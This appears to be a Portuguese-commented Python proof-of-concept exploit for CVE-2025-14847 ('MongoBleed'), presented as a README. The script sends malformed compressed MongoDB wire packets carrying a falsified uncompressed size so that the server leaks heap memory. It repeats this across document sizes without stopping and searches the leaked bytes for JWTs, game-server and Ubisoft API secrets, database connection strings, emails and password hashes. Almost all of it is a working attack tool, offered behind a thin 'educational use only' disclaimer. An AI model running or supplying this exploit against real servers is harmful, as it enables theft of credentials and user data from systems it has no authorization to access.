README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-14847 (MongoBleed) - Advanced Live Leaker PoC
Autor: Equipe de Pesquisa em Segurança
Licença: MIT (Uso Educacional Apenas)
Esta versão avançada testa incrementalmente diferentes tamanhos de documento
para maximizar a extração de dados vazados da memória heap do MongoDB.
"""
import argparse
import socket
import struct
import zlib
import re
import signal
import sys
import time
import json
from datetime import datetime
from typing import Dict, Set, List, Optional
from collections import defaultdict
# Conteúdo BSON padrão: campo int32 "a" = 1
DEFAULT_CONTENT = b'\x10a\x00\x01\x00\x00\x00'
# Padrões de interesse para R6 (mesmos da poc_PT.py)
R6_PATTERNS = {
"Token_JWT": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+",
"Auth_Servidor_R6": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}",
"Chave_Analytics_R6": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}",
"Chave_Telemetria_R6": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}",
"Segredo_API_Ubisoft": rb"UPLAY_API_SECRET_[a-z0-9]{30,}",
"UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
"URL_MongoDB": rb"mongodb://[a-zA-Z0-9_\-:@./]+",
"IP_Interno": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}",
"Time_Pro": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)",
"ID_Partida": rb"match_uuid_[a-f0-9\-]{36,}",
"Email": rb"[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+",
"Senha_Hash": rb"[a-f0-9]{32,}",
}
class LiveLeaker:
"""
Explorador incremental de vazamentos MongoDB
Testa diferentes tamanhos para maximizar extração de dados
"""
def __init__(self, host: str, port: int, min_len: int, max_len: int,
offset: int, timeout: float, sleep_time: float, verbose: bool = False):
self.host = host
self.port = port
self.min_len = min_len
self.max_len = max_len
self.offset = offset
self.timeout = timeout
self.sleep_time = sleep_time
self.verbose = verbose
# Estatísticas
self.stats = {
'tentativas': 0,
'sucessos': 0,
'falhas': 0,
'vazamentos_unicos': 0,
'inicio': datetime.now().isoformat()
}
# Armazenamento de vazamentos únicos
self.leaks_vistos: Set[str] = set()
self.leaks_por_categoria: Dict[str, Set[str]] = defaultdict(set)
# Controle de interrupção
signal.signal(signal.SIGINT, self._signal_handler)
def _signal_handler(self, sig, frame):
"""Handler para Ctrl+C"""
print("\n\n[*] Interrompido pelo usuário")
self._mostrar_resumo()
sys.exit(0)
def _construir_pacote(self, doc_len: int) -> bytes:
"""
Constrói pacote OP_COMPRESSED malicioso
Similar à função original mas encapsulada
"""
# Blob BSON mínimo
bson = struct.pack('<i', doc_len) + DEFAULT_CONTENT
# Corpo OP_MSG: flags=0, section kind=0, depois BSON
op_msg = struct.pack('<I', 0) + b'\x00' + bson
# Comprime OP_MSG interno usando zlib
compressed = zlib.compress(op_msg)
# Payload OP_COMPRESSED:
# - opcode original (OP_MSG = 2013)
# - tamanho não-comprimido alegado (doc_len + offset) <- MALICIOSO
# - ID do compressor (2 = zlib)
payload = struct.pack('<i', 2013)
payload += struct.pack('<i', doc_len + self.offset)
payload += struct.pack('B', 2)
payload += compressed
# Cabeçalho wire para OP_COMPRESSED
header = struct.pack('<iiii', 16 + len(payload), 1, 0, 2012)
return header + payload
def _receber_mensagem(self, sock: socket.socket) -> bytes:
"""Recebe uma mensagem completa baseada no campo de tamanho"""
response = b''
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
if len(response) >= 4:
msg_len = struct.unpack('<i', response[:4])[0]
if len(response) >= msg_len:
return response[:msg_len]
except socket.timeout:
break
return response
def _analisar_padroes_r6(self, dados: bytes) -> Dict[str, List[str]]:
"""Analisa dados em busca de padrões específicos do R6"""
resultados = {}
for categoria, padrao in R6_PATTERNS.items():
matches = re.findall(padrao, dados)
if matches:
matches_str = [m.decode('utf-8', errors='ignore') for m in matches]
matches_unicos = list(set(matches_str))
# Filtra matches que já vimos
novos = [m for m in matches_unicos if m not in self.leaks_por_categoria[categoria]]
if novos:
resultados[categoria] = novos
self.leaks_por_categoria[categoria].update(novos)
return resultados
def _tentar_vazamento(self, doc_len: int) -> Optional[bytes]:
"""Tenta vazar memória com tamanho específico de documento"""
self.stats['tentativas'] += 1
pacote = self._construir_pacote(doc_len)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect((self.host, self.port))
sock.sendall(pacote)
response = self._receber_mensagem(sock)
sock.close()
if len(response) >= 25:
self.stats['sucessos'] += 1
return response
else:
self.stats['falhas'] += 1
return None
except Exception as e:
self.stats['falhas'] += 1
if self.verbose:
print(f"[!] Erro doc_len={doc_len}: {e}")
return None
def _processar_resposta(self, response: bytes, doc_len: int) -> bool:
"""Processa resposta e extrai vazamentos"""
try:
msg_len = struct.unpack('<i', response[:4])[0]
opcode = struct.unpack('<i', response[12:16])[0]
# Se comprimido, descomprime; senão usa corpo diretamente
if opcode == 2012:
raw = zlib.decompress(response[25:msg_len])
else:
raw = response[16:msg_len]
except Exception:
return False
# Busca por nomes de campo (padrão MongoDB)
vazamentos_simples = []
for match in re.finditer(rb"field name '([^']*)'", raw):
leak = match.group(1)
if not leak or leak in [b'a', b'$db', b'ping', b'?']:
continue
try:
texto = leak.decode('utf-8', errors='replace')
if texto not in self.leaks_vistos:
vazamentos_simples.append(texto)
self.leaks_vistos.add(texto)
except:
pass
# Busca padrões R6 específicos
padroes_r6 = self._analisar_padroes_r6(raw)
# Exibe descobertas
encontrou_algo = False
if vazamentos_simples:
print(f"\n[+] Vazamento simples (doc_len={doc_len}):")
for leak in vazamentos_simples[:5]: # Mostra max 5
print(f" └─ Campo: {leak}")
if len(vazamentos_simples) > 5:
print(f" └─ ... e mais {len(vazamentos_simples)-5}")
encontrou_algo = True
if padroes_r6:
print(f"\n[!] PADRÕES R6 DETECTADOS (doc_len={doc_len}):")
for categoria, matches in padroes_r6.items():
print(f" [{categoria}] {len(matches)} novo(s):")
for m in matches[:3]: # Mostra max 3 por categoria
if len(m) > 70:
m = m[:67] + "..."
print(f" └─ {m}")
if len(matches) > 3:
print(f" └─ ... e mais {len(matches)-3}")
encontrou_algo = True
if encontrou_algo:
self.stats['vazamentos_unicos'] += len(vazamentos_simples) + sum(len(v) for v in padroes_r6.values())
return encontrou_algo
def _mostrar_progresso(self, doc_len: int):
"""Mostra progresso periodicamente"""
if self.stats['tentativas'] % 100 == 0:
taxa_sucesso = (self.stats['sucessos'] / self.stats['tentativas'] * 100) if self.stats['tentativas'] > 0 else 0
print(f"\r[*] Progresso: doc_len={doc_len}/{self.max_len} | "
f"Tentativas={self.stats['tentativas']} | "
f"Taxa sucesso={taxa_sucesso:.1f}% | "
f"Vazamentos únicos={self.stats['vazamentos_unicos']}", end='', flush=True)
def _mostrar_resumo(self):
"""Mostra resumo final das estatísticas"""
print("\n\n" + "="*60)
print("RESUMO DA SESSÃO DE LIVE LEAKING")
print("="*60)
print(f"Início: {self.stats['inicio']}")
print(f"Fim: {datetime.now().isoformat()}")
print(f"\nEstatísticas:")
print(f" - Tentativas totais: {self.stats['tentativas']}")
print(f" - Sucessos: {self.stats['sucessos']}")
print(f" - Falhas: {self.stats['falhas']}")
print(f" - Vazamentos únicos: {self.stats['vazamentos_unicos']}")
if self.leaks_por_categoria:
print(f"\nVazamentos por categoria:")
for categoria, leaks in self.leaks_por_categoria.items():
print(f" - {categoria}: {len(leaks)}")
print("="*60)
def executar(self, salvar_json: Optional[str] = None):
"""
Loop principal de exploração incremental
"""
print(f"\n{'='*60}")
print(f"[!] MongoBleed Live Leaker Avançado")
print(f"[!] Alvo: {self.host}:{self.port}")
print(f"[!] Faixa: doc_len {self.min_len} → {self.max_len} (offset={self.offset})")
print(f"{'='*60}\n")
print("[*] Transmitindo apenas vazamentos únicos (Ctrl+C para parar)")
print("[*] Aguarde detecção de padrões R6...\n")
doc_len = self.min_len
while True:
# Reinicia ciclo se atingir máximo
if doc_len > self.max_len:
doc_len = self.min_len
# Mostra progresso
if not self.verbose:
self._mostrar_progresso(doc_len)
# Tenta vazamento
response = self._tentar_vazamento(doc_len)
if response:
self._processar_resposta(response, doc_len)
# Incrementa e aguarda
doc_len += 1
time.sleep(self.sleep_time)
# Salva resultados se solicitado
if salvar_json:
self._salvar_resultados(salvar_json)
def _salvar_resultados(self, arquivo: str):
"""Salva resultados em JSON"""
resultado = {
'estatisticas': self.stats,
'vazamentos_por_categoria': {k: list(v) for k, v in self.leaks_por_categoria.items()},
'total_vazamentos': self.stats['vazamentos_unicos']
}
with open(arquivo, 'w', encoding='utf-8') as f:
json.dump(resultado, f, indent=2, ensure_ascii=False)
print(f"\n[+] Resultados salvos em: {arquivo}")
def main() -> int:
banner = """
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-14847: MongoBleed Live Leaker Avançado ║
║ Exploração Incremental com Detecção de Padrões R6 ║
║ AVISO: Apenas Testes Autorizados ║
╚══════════════════════════════════════════════════════════╝
"""
print(banner)
parser = argparse.ArgumentParser(
description="MongoBleed Live Leaker Avançado - Exploração incremental",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Exemplos:
# Exploração padrão
%(prog)s --host 127.0.0.1
# Faixa customizada com verbose
%(prog)s --host 127.0.0.1 --min 50 --max 10000 --verbose
# Salvar resultados em JSON
%(prog)s --host 127.0.0.1 --save resultados.json
"""
)
parser.add_argument("--host", default="127.0.0.1", help="IP/hostname do alvo")
parser.add_argument("--port", type=int, default=27017, help="Porta do alvo (padrão: 27017)")
parser.add_argument("--min", dest="min_len", type=int, default=20,
help="Tamanho mínimo do doc_len (padrão: 20)")
parser.add_argument("--max", dest="max_len", type=int, default=32768,
help="Tamanho máximo do doc_len (padrão: 32768)")
parser.add_argument("--offset", type=int, default=500,
help="Offset do buffer (padrão: 500)")
parser.add_argument("--timeout", type=float, default=2.0,
help="Timeout do socket em segundos (padrão: 2.0)")
parser.add_argument("--sleep", type=float, default=0.001,
help="Sleep entre iterações em segundos (padrão: 0.001)")
parser.add_argument("--verbose", action="store_true",
help="Modo verbose (mostra todos os erros)")
parser.add_argument("--save", help="Salvar resultados em arquivo JSON")
args = parser.parse_args()
# Validação de entrada
if args.min_len < 1 or args.max_len > 100000:
print("[-] Erro: Faixa de doc_len deve estar entre 1 e 100000")
return 1
if args.min_len >= args.max_len:
print("[-] Erro: --min deve ser menor que --max")
return 1
# Executa live leaker
leaker = LiveLeaker(
host=args.host,
port=args.port,
min_len=args.min_len,
max_len=args.max_len,
offset=args.offset,
timeout=args.timeout,
sleep_time=args.sleep,
verbose=args.verbose
)
try:
leaker.executar(salvar_json=args.save)
except KeyboardInterrupt:
pass
return 0
if __name__ == "__main__":
raise SystemExit(main())